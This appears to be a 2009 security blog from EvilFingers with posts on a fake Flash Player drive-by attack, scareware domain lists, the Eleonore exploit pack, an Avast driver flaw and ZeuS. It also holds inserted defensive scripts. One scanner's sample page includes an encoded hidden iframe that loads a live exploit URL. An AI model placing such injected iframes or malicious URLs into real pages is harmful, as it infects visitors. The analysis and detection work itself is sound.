Tuesday, September 29, 2009

Welcome Ocean!

Belated warm welcome to "OCEAN", a new member of EvilFingers. He is starting as a blogger for the EvilFingers blog. Later, he might be joining one of our analytics websites.

Check out his blog when you get a chance: http://inseclab.netsons.org/

- EF

Automatic propagation of malicious code via http

We know that automating the propagation of malware is one of the basic objectives of any cyber criminal, regardless of the attack vectors and technologies used.

In this sense, the Internet has become the cradle in which malicious alternatives that evolve daily are rocked. Several years ago it was quite difficult to assume that merely accessing a page posed a danger of infection if certain conditions were met, conditions that have to do primarily with operating system and application updates.

Today we find scripts whose instructions are crafted maliciously and form part of a cycle of spread and infection that is, unfortunately, very effective. A concrete example not only of evolution but also of effectiveness is the art of Drive-by-Download with its evolved Multi-Stage attacks, highly used by botmasters to propagate threats.

The following is an actual scenario that exemplifies more clearly what I mean. This is a site hosted in the USA under an IP address in AS32392. A screenshot of the website is shown below.

The domains hosted on that IP are:
  • phonester.biz
  • phonester.com
  • phonester.info
  • phonester.net
  • phonester.org
When accessed from Windows, a script embedded in the HTML code automatically opens a window offering to download Flash Player. It's obviously false. The propagated file is called "install_flash_player.exe" (abed2d16e5e4c3e369114d01dff4b19c) and has a low detection rate, as only about 25% of antivirus engines detect this malware, which is In-the-Wild.

This automatic process is carried out, as I said, through a script, a capture of which is shown below. The problem is that the page gives the user no indication of malicious content: in fact, it contains no links, only an image.

However, the script runs transparently and prompts the user to download the fake Flash Player. The issue doesn't end here: from a more technical standpoint there are many more details, and they aren't difficult to grasp.

First, deobfuscating the script yields a series of relevant data. The script contains iframe tags pointing to a range of pages from which other malicious files are downloaded:
  • diggstatistics.com/flash/pdf.php
  • diggstatistics.com/flash/directshow.php
  • diggstatistics.com/flash/exe.php
The downloaded files are "tylda.exe" (abed2d16e5e4c3e369114d01dff4b19c), which has a low detection rate (5/41, 12.20%), and "pdf.pdf" (9cc400edcdc5492482f5599d43b76c0c), with an equally low detection rate (13/41, 31.71%), designed to exploit vulnerabilities in Adobe Reader and Acrobat: the Adobe util.printf overflow (CVE-2008-2992) and Adobe getIcon (CVE-2009-0927) respectively.
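One way to triage a page like this one, written here as an added example (it is not the author's script nor the site's actual code): expand the output of document.write(unescape(...)), list every iframe, and flag frames that are zero-size or hidden and frames pointing at the host named above. The sample page is constructed for the example and does not reproduce the real site.

```python
import re

# Known-bad host taken from the analysis above (the exploit pages behind the iframes).
KNOWN_BAD_HOSTS = {"diggstatistics.com"}

# Constructed sample page (not captured from the site discussed): a lone image plus a
# script that writes a zero-size iframe via unescape(), next to a legitimate visible iframe.
SAMPLE_PAGE = """<html><body>
<img src="logo.png">
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fdiggstatistics.com%2Fflash%2Fpdf.php%22%20width%3D%220%22%20height%3D%220%22%3E%3C%2Fiframe%3E"));</script>
<iframe src="http://example.org/widget" width="300" height="200"></iframe>
</body></html>"""

_UNESCAPE_CALL = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)
_PCT = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
_IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
_ATTR = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def js_unescape(s):
    """Decode the input of JavaScript's unescape(): %XX and %uXXXX sequences."""
    return _PCT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def expand_unescape_calls(page):
    """Append the decoded argument of every unescape("...") call to the page, so iframes
    written by document.write(unescape(...)) become visible to the extractor."""
    decoded = [js_unescape(m.group(2)) for m in _UNESCAPE_CALL.finditer(page)]
    return page + "\n" + "\n".join(decoded)


def extract_iframes(page):
    """Return one dict of lower-cased attributes per <iframe> tag found in the page."""
    frames = []
    for tag in _IFRAME.finditer(page):
        attrs = {}
        for m in _ATTR.finditer(tag.group(1)):
            attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
        frames.append(attrs)
    return frames


def _host(url):
    m = re.match(r"^[a-z]+://([^/:?#]+)", url, re.I)
    return m.group(1).lower() if m else ""


def _is_zero(value):
    value = value.strip().rstrip("px").strip()   # accepts "0", "0px", "0 "
    return value.isdigit() and int(value) == 0


def assess(frame):
    """Reasons why one iframe looks like a drive-by injection (empty list = nothing odd)."""
    reasons = []
    if _is_zero(frame.get("width", "")) or _is_zero(frame.get("height", "")):
        reasons.append("zero-size")
    style = frame.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        reasons.append("hidden-by-style")
    if _host(frame.get("src", "")) in KNOWN_BAD_HOSTS:
        reasons.append("known-bad-host")
    return reasons


def scan(page):
    """Return [(src, reasons)] for every iframe in the page, decoded ones included."""
    return [(f.get("src", ""), assess(f)) for f in extract_iframes(expand_unescape_calls(page))]


if __name__ == "__main__":
    for src, reasons in scan(SAMPLE_PAGE):
        print(src, "->", ", ".join(reasons) or "looks normal")
```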

Moreover, in the unlikely event that the file downloaded in the first instance (install_flash_player.exe) is executed, a connection is established to garynic/, from which the binary "coin.exe" (258c0083f051b88ea36d3210eca18dd7) is downloaded, also with a quite poor detection rate. This file is downloaded at random from:
  • digital-plr.com
  • giggstatistics.com
  • xebrasearch.com
With regard to the ASN in which these threats are hosted, it has an interesting criminal history, as it is used to carry out activities such as spreading malware and phishing. In the next image, the highest peak of phishing activity took place on 1 March 2009, while that of malicious code was on 12 September 2009.

That is, these activities are operated together, not in isolation. This information suggests that behind all these criminal activities hides some greedy botmaster, since the actions are typical of a botnet.

Related information
Propagación de Malware (...) con formato de blogging y BlackHat SEO
Simbiosis del malware actual. Koobface
Scareware. Repositorio de malware In-the-Wild
Masiva propagación de malware (...) sitios de entretenimiento
Análisis esquemático de un ataque de malware basado en web

Jorge Mieres

Monday, September 28, 2009

Twitter.com/EvilFingers is Back!

Hey guys,

Twitter.com has finally removed my account from the SUSPENDED category, which allows us to Tweet again. Follow us @ twitter.com/evilfingers when you get a chance.

Thank you.

CYBINT in the business of Russian cybercriminals

Those who follow this blog sporadically will have noticed that for most of this year I devoted most of my posts to bringing out many of the applications from a black market, flooded from Russia, where all types of crimeware are available to professional cyber-criminals (botmasters, spammers, phishers, "cyber-terrorists?", etc.), without neglecting the candidates seeking to become high-ranking offenders.

In this sense, time has allowed us to witness how this illegal industry has grown, fueled heavily by Eastern European countries (particularly Russia), China and some Latin American countries led by Brazil. However, the flow and focus of attention remain in Russia, and, as I said at some point, it reminds me of the world that Gibson describes in Neuromancer, where the illegal marketing of malware is carried out in the dark streets of the suburbs.

Perhaps, as I did at some point, many will wonder: whatever the type of crimeware or the motivations (the main one has an acronym: USD) of the cyber-criminals, who is behind all this?

If we consider that the sale of these programs takes place around a dark business that is part of an industry operating from the underground (RBN - Russian Business Network), made up of cells that carry out well-organized fraud via the Internet (e.g. Russian scammers), corporate espionage (hiring pirates) and other things, it's easy to see that everything has a mafia connotation. And if we go deeper into the origin of the Russian mafia, we easily conclude that it was conceived by former KGB agents (the intelligence service of the former Soviet Union).

In fact, it's estimated that this criminal network, with former agents of what was the KGB, has on more than one occasion worked in conjunction with the FSB (Federal Security Service of the Russian Federation), the successor to the KGB.

What do I mean by this? Although what I write may seem extreme, we live in times in which we witness virtual conflicts involving certain countries. The computer attacks we see in Hollywood movies, a little exaggerated, have in recent years moved from fiction into the real world, and in this sense CYBINT (Cyber Intelligence) plays a fundamental role.

For example, there are more and more cases of defacement, which, although not new, make news when they affect the availability of government web sites and form the heart of the cyber-warfare of the day. DDoS (Distributed Denial of Service) attacks carried out through botnets, such as the one suffered by the site of the President of Georgia during the conflict with Russia (the Russians actually carried out a couple more, against Estonia and Lithuania), are clear examples of actions that seek to complement operations at the military level.

What is striking about cases like those mentioned in the preceding paragraph is that they leave advance planning and coordination in full evidence; it is nothing but an intelligence plan. Defacement may seem trivial, but we could say that within the conflict it is part of the psychological operations that seek to weaken the morale of the opposing side.

However, other less trivial aspects are also part of intelligence plans and are generally operated through technological resources, e.g. attacking the availability of telephone networks (COMINT), interrupting satellite signals and attacking other networks (SIGINT), including public ones, and affecting the confidentiality of people by using malware.

Under all this scenery, the RBN, one of the biggest cyber-criminal organizations operating on the infrastructure of the Internet, is the basis from which, in Russia (though there is a strong rumor that the RBN is migrating its operations to China), many malicious actions are channeled into pedophilia, pornography, the commercialization of crimeware, malware, phishing, botnets and more.

This really shows that the aspects involved in cyber-crime are controlled and operated by a mob in which Russian cybercriminals make up one of the most important pieces for the development of the crimeware industry globally, and as we see ... anything goes and everything merges into everything ...

Related information
Inteligencia informática, Seguridad de la Información y Ciber-Guerra
Los precios del crimeware ruso. Parte 2

Jorge Mieres

Twitter Power

Either Twitter needs to upgrade its hardware, or it should find a way to load-balance its traffic. Most of our friends using Twitter are finding it hard to reach their own accounts sometimes.

Also, we finally found the reason as to why our Twitter account was suspended.

* Your account was suspended for posting duplicate content over multiple accounts or multiple duplicate updates on one account, a violation of our terms of service and the Twitter Rules that we take very seriously.

* Your account will remain suspended for a minimum of 30 days; at the end of that time, you may petition for reinstatement. You may do so by either a) re-opening this ticket or b) filing a new ticket and referencing this one.

Thank you,

The tool we used to tweet with on the iPhone did not show that we had already tweeted once, and hence when we hit Resend, Twitter blocked us for tweeting the same tweet twice.

Twitter! You really need to ask the responsible party for their reasons before you suspend a valid user.

- EF

SmitFraudFix v2.423 (WinXP, Win2K)

S!ri is a security analyst working actively on crimeware detection. He has joined us to lead the Crimeware Analytics team along with Jorge Mieres.

S!ri's blog can be found at the following link:

SmitFraudFix, a free crimeware detection tool, was created by S!ri to help our community.

This tool removes Desktop Hijack malware: Advanced Antivirus, Advanced Virus Remover, AdwarePunisher, AdwareSheriff, AlphaCleaner, AntiSpyCheck, AntiSpyware Expert, Antispyware Soldier, AntiVermeans, AntiVermins, AntiVerminser, AntiVirGear, Antivirus 2009, Antivirus 2010, Antivirus 360, AntiVirus Lab 2009, Antivirus Master, Antivirus Sentry, Antivirus System Pro, Antivirus XP 2008, AntivirusGolden, AV Antispyware, AVGold, Awola, BraveSentry, Coreguard Antivirus, Extra Antivirus, HomeAntivirus 2009, IE Defender, IE-Security, Internet Antivirus, Malware Defender 2009, MalwareCrush, MalwareWipe, MalwareWiped, MalwaresWipeds, MalwareWipePro, MalwareWiper, Micro Antivirus 2009, MS AntiSpyware 2009, MS Antivirus, PC Protection Center 2008, Personal Defender 2009, PestCapture, PestTrap, Power Antivirus, Power-Antivirus-2009, PSGuard, quicknavigate.com, RegistryFox, Registry Cleaner, Renus 2008, Security iGuard, Smart Antivirus 2009, Smitfraud, SmitFraudFixTool, Spy Protector, SpyAxe, SpyCrush, SpyDown, SpyFalcon, SpyGuard, SpyHeal, SpyHeals, SpyLocked, SpyMarshal, SpySheriff, SpySoldier, Spyware Guard 2008, Spyware Protect 2009, Spyware Vanisher, Spyware Soft Stop, SpywareLocked, SpywareQuake, SpywareKnight, SpywareRemover, SpywareSheriff, SpywareStrike, Startsearches.net, System Antivirus 2008, System Guard 2009, TheSpyBot, TitanShield Antispyware, Total Protect 2009, Total Secure 2009, Trust Cleaner, Ultimate Antivirus 2008, UpdateSearches.com, UnVirex, Virtual Maid, Virus Heat, Virus Protect, Virus Protect Pro, VirusBlast, VirusBurst, VirusRay, Virus Remover 2008, Virus Shield, VirusResponse Lab 2009, VirusTrigger, Win32.puper, WinHound, WinPC Defender, WiniBlueSoft, Vista Antivirus 2008, WinDefender 2009, XLG Security Center, XP Deluxe Protector, XP Security Center, XPert Antivirus, XP Police Antivirus, Brain Codec, ChristmasPorn, DirectAccess, DirectVideo, EliteCodec, eMedia Codec, EZVideo, FreeVideo, Gold Codec, HQ Codec, iCodecPack, IECodec, iMediaCodec, Image ActiveX Object, Image Add-on, IntCodec, iVideoCodec, JPEG Encoder, Key Generator, LookForPorn, Media-Codec, MediaCodec, MMediaCodec, MovieCommander, MPCODEC, My Pass Generator, NetProject, Online Image Add-on, Online Video Add-on, PCODEC, Perfect Codec, PowerCodec, PornPass Manager, PornMag Pass, Pornovid, PrivateVideo, QualityCodec, Silver Codec, SearchPorn, SexVid, SiteEntry, SiteTicket, SoftCodec, strCodec, Super Codec, TrueCodec, VideoAccess, VideoBox, VidCodecs, Video Access ActiveX Object, Video ActiveX Object, Video Add-on, VideoCompressionCodec, VideoKeyCodec, VideosCodec, WinAntiSpyPro, WinMediaCodec, X Password Generator, X Password Manager, ZipCodec, WinCoDecPRO...


Use this URL to download the latest version (the file contains both English and French versions):

This tool was created by S!Ri, and is available for FREE.
Voluntary donations will be accepted by S!Ri, at his main website only.
Anyone, other than the creator, trying to make a profit
or solicit money from its use would be involved in fraudulent activity.

-- Source: http://siri.urz.free.fr/Fix/SmitfraudFix_En.php

We thought of sharing this great tool with our community and would like our community to give a warm welcome to S!ri and Jorge Mieres in their efforts to build and improve the Crimeware Analytics community.

- EF

Sunday, September 27, 2009

IOCTL fuzzer parser

As written on the esage lab website, by the creators of IOCTL Fuzzer:
"IOCTL Fuzzer is a command line tool designed to automate searching vulnerabilities in Windows kernel drivers by performing fuzz tests on them."

When started without a configuration, the tool starts in a useful monitor mode that logs IRPs. From the log we can see the driver, device, process and IOCTL code of each IRP; these are of interest when creating a configuration for the fuzzer.

example of use: ioctl_fuzzer > log

Wandering through the log to find what we are looking for can take a while; that's where IOCTL filter comes to help.
It's a Python script written to organize IOCTL fuzzer logs better and find immediately what we need.

example of use: python ioctl_fuzzer.py -p process <> out

It takes the log from stdin and outputs to stdout; with the -p, -e and -r options we can filter only the process, device or driver, respectively, whose name contains a word we are interested in.
In the example we are interested in all processes whose name contains "process".

With the information retrieved, we can then build a configuration XML to fuzz the IRPs we are interested in.
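A filter of the kind described above, written here as an added example rather than Ocean's ioctl_fuzzer.py: it reads the monitor log from stdin, keeps the IRP lines whose process, device or driver contains the word given with -p, -e or -r, and prints the distinct IOCTL codes per driver and device, which is what a fuzzer configuration needs. The log line layout (LOG_LINE) and the sample log are constructed for the example; IOCTL Fuzzer's real output differs, so the regex must be adapted to it.

```python
import argparse
import re
import sys
from collections import Counter

# Assumed line layout (constructed for this example, not IOCTL Fuzzer's real format).
LOG_LINE = re.compile(
    r'Process:\s*"(?P<process>[^"]*)"\s*'
    r'Driver:\s*"(?P<driver>[^"]*)"\s*'
    r'Device:\s*"(?P<device>[^"]*)"\s*'
    r'IOCTL:\s*(?P<ioctl>0x[0-9A-Fa-f]+)'
)

# Constructed sample log in the assumed layout; names are made up.
SAMPLE_LOG = """IOCTL monitor started
Process: "myprocess.exe" Driver: "\\Driver\\DemoDrv" Device: "\\Device\\DemoDev" IOCTL: 0x00222004
Process: "svchost.exe" Driver: "\\Driver\\Tcpip" Device: "\\Device\\Tcp" IOCTL: 0x00120028
Process: "myprocess.exe" Driver: "\\Driver\\DemoDrv" Device: "\\Device\\DemoDev" IOCTL: 0x00222008
Process: "myprocess.exe" Driver: "\\Driver\\DemoDrv" Device: "\\Device\\DemoDev" IOCTL: 0x00222004
"""


def parse_entry(line):
    """Return a dict for a log line that records an IRP, or None for any other line."""
    m = LOG_LINE.search(line)
    return m.groupdict() if m else None


def filter_entries(lines, process=None, device=None, driver=None):
    """Keep IRP entries whose fields contain the given words (case-insensitive substring)."""
    wanted = {"process": process, "device": device, "driver": driver}
    kept = []
    for line in lines:
        entry = parse_entry(line)
        if entry is None:
            continue
        if all(word is None or word.lower() in entry[field].lower()
               for field, word in wanted.items()):
            kept.append(entry)
    return kept


def summarize(entries):
    """Count how often each (driver, device, ioctl) triple was seen."""
    return Counter((e["driver"], e["device"], e["ioctl"]) for e in entries)


def main():
    ap = argparse.ArgumentParser(description="Filter an IOCTL Fuzzer monitor log read from stdin")
    ap.add_argument("-p", metavar="WORD", help="keep entries whose process name contains WORD")
    ap.add_argument("-e", metavar="WORD", help="keep entries whose device name contains WORD")
    ap.add_argument("-r", metavar="WORD", help="keep entries whose driver name contains WORD")
    args = ap.parse_args()
    entries = filter_entries(sys.stdin, process=args.p, device=args.e, driver=args.r)
    for (driver, device, ioctl), count in sorted(summarize(entries).items()):
        print("%-24s %-24s %s  x%d" % (driver, device, ioctl, count))


if __name__ == "__main__":
    main()
```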


Crimeware, Scareware, Ransomware & Rogueware

Crimeware is a class of malware designed specifically to automate cybercrime.[1] The term was coined by Peter Cassidy, Secretary General of the Anti-Phishing Working Group to distinguish it from other kinds of malevolent programs.

Crimeware (as distinct from spyware, adware, and malware) is designed (through social engineering or technical stealth) to perpetrate identity theft in order to access a computer user's online accounts at financial services companies and online retailers for the purpose of taking funds from those accounts or completing unauthorized transactions that enrich the thief controlling the crimeware. Crimeware also often has the intent to export confidential or sensitive information from a network for financial exploitation. Crimeware represents a growing problem in network security as many malicious code threats seek to pilfer confidential information.

Source: http://en.wikipedia.org/wiki/Crimeware


Scareware comprises several classes of scam software, often with limited or no benefit, sold to consumers via certain unethical marketing practices. The selling approach is designed to cause shock, anxiety, or the perception of a threat, generally directed at an unsuspecting user. Some forms of spyware and adware also use scareware tactics.

A frequently used tactic involves convincing users that a virus has infected their computer, then suggesting that they download (and pay for) antivirus software to remove it. Usually the virus is entirely fictional and the software is non-functional or malware.[1] According to the Anti-Phishing Working Group, the number of scareware packages in circulation rose from 2,850 to 9,287 in the second half of 2008.[2]

The "scareware" label can also apply to any application or virus (not necessarily sold as above) which pranks users with intent to cause anxiety or panic.

Source: http://en.wikipedia.org/wiki/Scareware


Ransomware is computer malware which holds a computer system, or the data it contains, hostage against its user by demanding a ransom for its restoration.

Source: http://en.wikipedia.org/wiki/Ransomware_(malware)


Rogue security software is a form of computer malware that deceives or misleads users into paying for the fake or simulated removal of malware. Rogue security software, in recent years, has become a growing and serious security threat in desktop computing.[1]

Source: http://en.wikipedia.org/wiki/Rogue_security_software

Crimeware, Scareware, Ransomware & Rogueware are different, but they all unite under one term: "Malware". They are different classes of malware, divided according to their properties and relationships.

- EF

Saturday, September 26, 2009

Blonde spammers

Have you ever received an email from a beautiful blonde girl you don't know? She wants to know you, and to get one of your photos to know you better.

Maybe you asked yourself how a beautiful girl you don't know got your personal email, and why she wants to know you if you have never met her.

Strange story... collecting some of these emails can give us some answers.
Collecting them showed one thing first of all: all the collected emails show a blonde girl. Why never a brunette?

Maybe seeing a candid and innocent blonde girl lowers your defenses, so you wouldn't think about the risks that replying to such an email poses.

Let's get a deeper look at some of the images received with the emails:

Some EXIF data tells that gd-jpeg has been used to create the images. gd is an open source graphics library with bindings for lots of programming languages (some other images found have less suspicious EXIF data).

So we have another question now... why would a girl use a graphics library?
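The gd library writes its signature ("CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = NN") into the JPEG comment (COM) segment, which metadata tools display next to the EXIF fields. As an added example (not Ocean's tooling), this parser walks the JPEG marker segments, reports any comments and whether an Exif APP1 block is present, and flags an image that carries the gd signature without camera metadata. The two sample images are constructed marker skeletons, not real photographs.

```python
import struct

EOI, SOS, COM, APP0, APP1 = 0xD9, 0xDA, 0xFE, 0xE0, 0xE1
GD_CREATOR_PREFIX = "CREATOR: gd-jpeg"   # start of the comment gd's JPEG writer emits


def _segment(marker, payload):
    """Build one marker segment: 0xFF, marker, 2-byte big-endian length (counts itself), payload."""
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed samples: header skeletons only (no scan data), enough to exercise the parser.
SAMPLE_GD_JPEG = (
    b"\xff\xd8"
    + _segment(APP0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(COM, b"CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75")
    + b"\xff\xd9"
)
SAMPLE_CAMERA_JPEG = (
    b"\xff\xd8"
    + _segment(APP1, b"Exif\x00\x00MM\x00\x2a\x00\x00\x00\x08\x00\x00")
    + b"\xff\xd9"
)


def jpeg_segments(data):
    """Yield (marker, payload) for every header segment before the scan data or EOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                               # fill byte before a marker
            pos += 1
            continue
        if marker in (EOI, SOS):                         # headers end here
            return
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:     # standalone markers, no length
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment at offset %d" % pos)
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError("bad segment length at offset %d" % pos)
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def image_report(data):
    """Summarise the writer-identifying metadata of one JPEG."""
    comments, has_exif = [], False
    for marker, payload in jpeg_segments(data):
        if marker == COM:
            comments.append(payload.decode("latin-1"))
        elif marker == APP1 and payload.startswith(b"Exif\x00"):
            has_exif = True
    generator = "gd-jpeg" if any(c.startswith(GD_CREATOR_PREFIX) for c in comments) else None
    return {"comments": comments, "has_exif": has_exif, "generator": generator}


def looks_bulk_generated(data):
    """True when the image was written by gd and carries no camera (Exif) metadata."""
    report = image_report(data)
    return report["generator"] == "gd-jpeg" and not report["has_exif"]


if __name__ == "__main__":
    for name, sample in (("gd sample", SAMPLE_GD_JPEG), ("camera sample", SAMPLE_CAMERA_JPEG)):
        print(name, image_report(sample), "bulk-generated:", looks_bulk_generated(sample))
```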

Putting all the questions together, we can say that this email can be:
  • a fraud
  • a way for spammers to see if the email is active
  • a try to steal sensitive informations
This case should make us think about the different threats an attack can pose even with a simple email and the collaboration of the victim.


A recent tour of scareware XV

A new wave of scareware is running on the Internet. As I clarify in each entry of this series, the list of URLs and IP addresses below represents only a small percentage, a very small one, of the impressive body of IPs and domains that spread this type of malware daily.

MD5: 96a2cfdb534b547518a446a48150624e
Korea, Republic Of, Seoul, Hanaro Telecom Inc
Associated Domains

Result: 24/41 (58.54%)

Omega AntiVir = Windows System Suite
Canada, Brampton, Velcom
Associated Domains

MD5: 8b1555ab8de5f4884e95e72d1755c984
Russian Federation, Madet Ltd
Associated Domains

Result: 7/41 (17.07%)

Soft Safeness = Save Defender = Trust Warrior
Sweden, Stockholm, Serverconnect I Norrland
United Kingdom, Telos Solutions Ltd
Associated Domains

MD5: 783385a90259131a89da62d10df67fa6
Korea, Republic Of, Seoul, Thrunet Co. Ltd
Associated Domains
cocoda.co.kr, dvccode.com
i-viewtec.com, microv3.com
newocn.net, phoneboja.com
rich09.com, samsung77.com
Result: 22/41 (53.66%)


Proof Defender 2009
United States, Portland, Donald Wildes
Associated Domains

System Cleaner
United States, Lancaster, Hosting Solutions International Inc
Associated Domains

Privacy Center
MD5: 3731bde3c476993cbec9e849e4922c87
Sweden, Stockholm, Serverconnect I Norrland
Associated Domains

Result: 6/41 (14.63%)

The goal is to use this information as a resource to block harmful addresses.

Related information
Una recorrida por los últimos scareware XIV
Una recorrida por los últimos scareware XIII
Una recorrida por los últimos scareware XII
Una recorrida por los últimos scareware XI
Una recorrida por los últimos scareware X
Una recorrida por los últimos scareware IX
Una recorrida por los últimos scareware VIII
Una recorrida por los últimos scareware VII
Una recorrida por los últimos scareware VI
Una recorrida por los últimos scareware V
Una recorrida por los últimos scareware IV
Una recorrida por los últimos scareware III
Una recorrida por los últimos scareware II
Una recorrida por los últimos scareware I

Jorge Mieres

New version of Eleonore Exploits Pack In-the-Wild

As usual, crimeware maintains a development cycle that never loses the focus nurtured in the minds of the cyber criminals behind its marketing: money.

This cycle depends directly on who develops the crimeware; e.g. in the case of ZeuS the cycle is about 30 days, so roughly every month there is a new version of ZeuS, and likewise with any of the alternatives.

In this case it's a new version, 1.3B, of Eleonore Exploits Pack, a package designed to manage and control a botnet of zombies, whose development follows a cycle similar to the one I referred to above for ZeuS, one of its colleagues.

This version of Eleonore Exp hasn't yet been released directly; it's available exclusively and, for the moment, there are only some test versions with which its operation is being tried out.

In other words, this new version isn't yet in the specialist underground environment and could only be acquired through its programmer.

So far I haven't addressed this issue in greater depth; however, I feel that perhaps the most important change lies in the availability of new exploits, connectivity, and optimization improvements in the intelligence process for obtaining statistical data about the zombies (countries, browser, OS, etc.).

Still, this reflects the "enthusiasm" with which cybercriminals are working to "optimize" (improvements, its creator, who calls himself Exmanoize, would say) the range of malicious functions incorporated in each variant.

Related information
Phoenix Exploit’s Kit. Otra alternativa para el control de botnets
iNF`[LOADER]. Control de botnets, marihuana y propagación de malware
Liberty Exploit System. Otra alternativa crimeware para el control de botnets
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild

Jorge Mieres

Jsunpack-n update v0.3a: SWF parsing and Bug fixes release

Read more about the latest release of Jsunpack @ http://jsunpack.blogspot.com/2009/09/jsunpack-n-update-v03a-swf-parsing-and.html

Download the latest version of Jsunpack-n [Version 0.3a] from the following link:


Contact Blake, if you have any questions.

- EF

Friday, September 25, 2009

MalwareURL.com - An interesting site

We came across an interesting site which takes inputs from several sites and enumerates them. It's pretty good stuff for analysts, since it puts the things you want to see in a short, crisp table.

MalwareURL team:
The MalwareURL Team is a group of Internet security experts dedicated to fighting malware, Trojans and a multitude of other web-related threats.

Our database is built-up using proprietary software and analytic techniques to locate, assess and monitor suspected sources of web criminality.

We provide invaluable and up-to-date information to everyone from interested individuals to the world's leading Internet security organizations.

Your use of this web site constitutes agreement to all Terms and Conditions. If you intend to use our lists in a commercial product or service, please contact us for licensing information.

--Source: MalwareURL.com

- EF

Thursday, September 24, 2009

Gmail Chat is back!

The Chat is back and fully functional. Yay!


Unusual & Disturbing

GMAIL Chat is down! The gchat in Gmail has been down for the past couple of hours and the only alert we get is:

Gmail is temporarily unable to access your Contacts. You may experience issues while this persists. Learn more

This is sad. Gmail is the only product one could think of as the best thing Google has ever done, apart from the search engine with which Google made its entry.

- EF

Wednesday, September 23, 2009

Advisory: Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation.

Version Affected: Product: Avast antivirus 4.8.1351.0 (other versions could be affected)
Affected Component: aswMon2.sys 4.8.1351.0
Category: Local Denial of Service due to kernel memory corruption (BSOD)
(untested) Local Privilege Escalation

Discover Date: Sep 13, 2009 PoC Code: Sep 13, 2009
Vendor Notify: Sep 15,2009 Vendor Reply: Sep 15, 2009

Avast's aswMon2.sys driver does not sanitize user-supplied input (IOCTL), and this leads to a kernel memory corruption that manifests on the system as a BSOD, with a potential risk of Privilege Escalation.

00010F70 cmp [ebp+arg_C], 288h ;InBuff Len no other checks performed
00010F77 jnz loc_111AC
00010F7D mov esi, [ebp+SourceString]
00010F80 cmp [esi], ebx
00010F82 mov [ebp+arg_C], ebx

Giuseppe 'Evilcry' Bonfa' (Project Manager, www.EvilFingers.com)
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org, http://evilcodecave.blogspot.com

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.

Click here to read the entire advisory & PoC.

- EF

Tuesday, September 22, 2009

Who makes your decisions?

Would you let some stranger make your decisions? Would you like to see stuff that others want you to see? If the answer is "NO", then why would you go for a decision engine when you have search engines giving you the freedom you deserve?

Bing - Decision Engine
Google - Search Engine

- EF


Our Twitter account has been suspended for almost a month. We have been contacting Twitter, but we haven't gotten any response yet. A couple of reasons that I could think of are:
1. Our Retweets
2. Adding multiple members at once

Thank you for your patience.
- EF

Monday, September 21, 2009

Effectiveness of the antivirus front ZeuS

After the release of the ZeuS code in 2007, the trojan has without doubt become, besides one of the largest botnets, the one with the highest infection rate globally.

On my blog we have discussed some features of this botnet, which, with more than 20 versions since its recent appearance, has gained importance in the specialized media through a series of reports describing some of its most important aspects.

For example, RSA recently published a report on online fraud describing the incorporation of a Jabber component that instantly alerts the botmaster when a new zombie has been recruited. S21Sec recently conducted an online seminar on the evolution of ZeuS in which they described its most important patterns, among other technical details.

Adding to this wave, the company Trusteer recently released a short but interesting report on ZeuS that presents a different perspective. Titled "Measuring the in-the-wild effectiveness of antivirus against ZeuS", it clearly shows the effectiveness of antivirus security solutions against the malicious code that this particular botnet spreads.

There are some interesting facts that emerge from the report. According to it, ZeuS currently has under its command about 3.6 million PCs in the U.S. alone and accounts globally for 44% of the zombies that are part of botnets, which makes it clear that it is now the largest network of zombies.

In this sense, a strong foundation for these data may be the popularity of ZeuS in the clandestine marketing environment of the Russian market, thanks to the low cost of crimeware in general, and the release of its first versions in different forums from which they can be obtained for free.

In fact, of the two generations of ZeuS (versions 1 and 2), a high percentage of the botnets in-the-wild belong to the first generation, with a wide range of versions ranging from 1.0.x.x to 1.1.x.x.

Currently, ZeuS is at public version 1.2.5, although there are private versions with some modifications (improvements for botmasters) that are at present not available in the underground but are nevertheless in-the-wild, as is the case of version 1.2.7.

But the most important part of this report, as I mentioned above, concerns the effectiveness of antivirus, as shown by the detection index for the trojan.

While the data reported by Trusteer are very interesting, there are a number of issues to consider. One of them, which should be clarified, is that ZeuS has an internal application in which the propagated binary is generated from the configuration file, which holds the information for phishing and other fraudulent attacks. But it also lets the botmaster run other attacks through exploits designed for vulnerabilities in applications that use Flash and PDF readers, by means of .pdf and .swf files.

Moreover, the sample analysed was 10,000 zombies; although this does not reflect the real number of systems infected with ZeuS, it provides sufficiently precise information about the security risk the malware represents.

Most worrying, according to the report, the infection data collected are based on three factors that directly involve antivirus programs, revealing the following levels of effectiveness:
  • Computers without antivirus: 31% infected
  • Computers with outdated antivirus: 14% infected
  • Computers with updated antivirus: 55% infected
This means that the effectiveness of antivirus programs is low because the detection rate for ZeuS is low. It must be borne in mind that ZeuS has been a complex piece of malicious code from the beginning, and incorporates a cryptographic module.

